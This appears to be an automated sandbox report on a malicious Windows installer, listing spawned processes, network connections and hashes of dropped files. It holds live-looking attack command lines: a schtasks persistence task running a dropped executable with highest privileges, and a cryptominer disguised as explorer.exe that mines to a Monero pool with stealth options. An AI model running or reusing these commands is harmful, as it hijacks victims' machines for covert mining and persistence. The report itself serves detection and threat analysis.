
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe383c46f8,0x7ffe383c4708,0x7ffe383c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
N/A 127.0.0.1:54195 tcp
N/A 127.0.0.1:54197 tcp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 live.goatgame.live udp
NL 51.15.89.13:14433 xmr-eu2.nanopool.org tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.89.23.91:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3394285ab7e1ef48bc775f71ed7b0a76
SHA1 646fadf1a0a0dafe07319c86de0587ed96a0fc2b
SHA256 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467
SHA512 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3744-45-0x0000000001420000-0x00000000014AF000-memory.dmp

memory/3744-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-48-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-56-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3744-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/4872-112-0x00000000005C0000-0x00000000005EC000-memory.dmp

memory/3888-111-0x0000000000350000-0x000000000043E000-memory.dmp

memory/4872-115-0x0000000000C90000-0x0000000000CB0000-memory.dmp

memory/4948-116-0x0000000000590000-0x00000000006D2000-memory.dmp

memory/4872-113-0x0000000000C80000-0x0000000000C86000-memory.dmp

memory/4948-118-0x0000000005480000-0x0000000005A24000-memory.dmp

memory/4948-119-0x0000000004F80000-0x0000000005012000-memory.dmp

memory/4872-117-0x0000000000CB0000-0x0000000000CB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/3984-94-0x0000000000010000-0x0000000000018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

memory/3744-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3744-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-47-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3744-46-0x000000006494A000-0x000000006494F000-memory.dmp

memory/3744-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3744-38-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4948-121-0x00000000052F0000-0x000000000538C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2180-138-0x0000000000010000-0x0000000000020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/4948-120-0x0000000005130000-0x000000000513A000-memory.dmp

memory/3692-143-0x0000000002230000-0x0000000002314000-memory.dmp

memory/2676-155-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/3744-165-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3744-171-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-170-0x0000000001420000-0x00000000014AF000-memory.dmp

memory/3744-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3744-161-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/3744-168-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3744-167-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2104-173-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/4948-174-0x0000000002710000-0x0000000002722000-memory.dmp

memory/1016-184-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2180-185-0x00000000025F0000-0x00000000025FE000-memory.dmp

memory/2180-186-0x0000000002620000-0x0000000002632000-memory.dmp

memory/4948-199-0x0000000009020000-0x00000000090AC000-memory.dmp

memory/4948-200-0x0000000005430000-0x000000000544E000-memory.dmp

memory/2040-202-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/4648-209-0x0000000002B60000-0x0000000002B96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

memory/2040-212-0x0000000005DF0000-0x0000000006408000-memory.dmp

memory/2040-213-0x0000000003230000-0x0000000003242000-memory.dmp

memory/2040-214-0x0000000005850000-0x000000000588C000-memory.dmp

memory/4648-215-0x00000000057B0000-0x0000000005DD8000-memory.dmp

memory/2040-216-0x0000000005890000-0x00000000058DC000-memory.dmp

memory/4648-217-0x00000000055A0000-0x00000000055C2000-memory.dmp

memory/4648-219-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/4648-218-0x0000000005640000-0x00000000056A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwvvhl0k.xs3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4648-229-0x0000000005EE0000-0x0000000006234000-memory.dmp

memory/2040-232-0x0000000005AD0000-0x0000000005BDA000-memory.dmp

memory/4648-233-0x0000000006470000-0x000000000648E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/4648-235-0x0000000007440000-0x0000000007472000-memory.dmp

memory/4648-236-0x0000000074FB0000-0x0000000074FFC000-memory.dmp

memory/4648-246-0x0000000006A00000-0x0000000006A1E000-memory.dmp

memory/4648-248-0x0000000007680000-0x0000000007723000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a0486d6f8406d852dd805b66ff467692
SHA1 77ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256 c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512 065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

memory/4648-254-0x0000000007DE0000-0x000000000845A000-memory.dmp

memory/4648-255-0x00000000077A0000-0x00000000077BA000-memory.dmp

memory/4648-256-0x0000000007810000-0x000000000781A000-memory.dmp

memory/4648-266-0x0000000007A20000-0x0000000007AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 dc058ebc0f8181946a312f0be99ed79c
SHA1 0c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256 378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA512 36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

\??\pipe\LOCAL\crashpad_3076_JQQLSOGSOTFHNEIW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 efe4c40a4047904ba49903c0916832ab
SHA1 7ca7e3712f047343e52d753648f6f7c4787f3706
SHA256 6aa35055139b97ceb0f01a2a6f78ac175d19bdd0b7366c98d6f5da567cc8a4a4
SHA512 4455845884f5f273e50bd34910078caa442971dff64d295994c9d2c2d0cc68301a3a88bdae70e97f49e8ad87a2779d23a2215afab2a446b1843d278e5c3c6b45

memory/4648-274-0x00000000079A0000-0x00000000079B1000-memory.dmp

memory/4648-275-0x00000000079D0000-0x00000000079DE000-memory.dmp

memory/4648-276-0x00000000079E0000-0x00000000079F4000-memory.dmp

memory/4648-277-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

memory/4648-278-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4119bdbeae429197de1d78250e3a89a6
